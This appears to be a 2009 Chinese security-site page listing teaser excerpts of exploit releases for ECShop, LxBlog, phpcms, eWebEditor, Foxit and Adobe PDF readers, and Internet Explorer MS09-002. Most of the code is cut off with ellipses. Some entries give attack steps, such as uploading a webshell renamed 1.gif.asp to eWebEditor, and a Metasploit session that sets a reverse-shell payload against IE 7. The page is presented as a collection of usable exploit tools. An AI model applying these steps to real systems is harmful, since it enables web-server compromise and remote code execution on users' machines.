ECShop <= v2.6.2 注入漏洞利用工具exploit
ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit

作者：Ryat
2009-03-24

影响2.5.x和2.6.x,其他版本未测试

……

《浅析LxBlog V6变量未初始化漏洞》作者：Flyh4t

本文已经发表在黑客防线,转载请署名

Lxblog 是 PHPWind 开发的一套基于 PHP+MySQL 数据库平台架构的多用户博客系统，强调整站与用户个体间的交互，拥有强大的个人主页系统、独立的二级域名体系、灵活的用户模板系统、丰富的朋友圈和相册功 能。但是该blog系统在安全性上并不让人满意，本文就来分析lxblog一个变量未初始化造成的sql注入漏洞。

Foxit Reader 3.0 (<=Build 1301) PDF 缓冲区溢出漏洞利用工具Exploit，仅供研究，请勿用于非法用途

phpcms2008 0day ask/search_ajax.php

受影响程序： phpcms2008 gbk

漏洞文件：ask/search_ajax.php

......

作者：toby57

VIEWGOOD VOD视频点播系统 (WebVOD)注入漏洞
漏洞产生于文件/webmedia/oemui/user/guest.asp，访问这个页面需要注册

相关代码：

......

Adobe PDF阅读器JBIG2本地缓冲区溢出漏洞 0day利用工具exploit

#!/usr/bin/perl
# k`sOSe 02/22/2009

# http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html

......

今天和静流聊天，他说eWebEditor v6.0.0出了最新漏洞。于是就是检测一下，这个程序爆漏洞一般都是直接上传的漏洞，不过没错 就是上传漏洞。首先在本地搭建一个ASP环境重命名一个木马名字例如：1.gif.asp这样的就OK了。

那么接下来完美本地搭建一个环境你可以用WEB小工具搭建一个，目的就是让远程上传。

【这里如果上传asp文件的话，使用IIS的话，应该取消asp的解析，使其成为一个可以下载的asp文件，如果解析了，可能就只是解析后的html文件了，Neeao注】

......

动易SiteWeaver 6.6版最新漏洞利用工具，直接贴代码：

......

注：浏览本文杀毒软件可能会报毒，夜火的瑞星是报了，不过 IE 7 Exploit MS09-002内存破坏漏洞利用程序 的JavaScript代码是直接以文本形式贴出来的，不会运行，大家可以放心浏览

Microsoft IE CFunctionPointer函数内存破坏漏洞（MS09-002）
发布时间:2009-02-10
影响版本:
Microsoft Internet Explorer 7.0

漏洞描述:
BUGTRAQ ID: 33627
CVE(CAN) ID: CVE-2009-0075

Comment by Friddy:
这个实际不是个破坏内存的漏洞，可以利用这个漏洞执行任意的代码。
今天我花了十几分钟修改了miliw0rm的只会造成DOS的POC，现在已经可以较为稳定执行任意代码。

MS09002 Memory Corruption Exploit

Details to follow. :-)

msf > use exploit/windows/browser/ms09_002
msf exploit(ms09_002) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms09_002) > set LPORT 1701
LPORT => 1701

eWebEditor 2.8.0最终版 删除任意文件漏洞利用程序，这个漏洞可以很鸡肋，也可以很致命，关键看你怎么利用！

此漏洞存在于ExampleNewsSystem目录下的delete.asp文件中，这是ewebeditor的测试页面，无须登陆可以直接进入，看这些代码：

......

eWebEditor 2.1.6 asp版 上传漏洞利用程序，修改上传地址保存为HTM文件，打开可以直接上传CER文件，测试成功。上传后地址看源文件。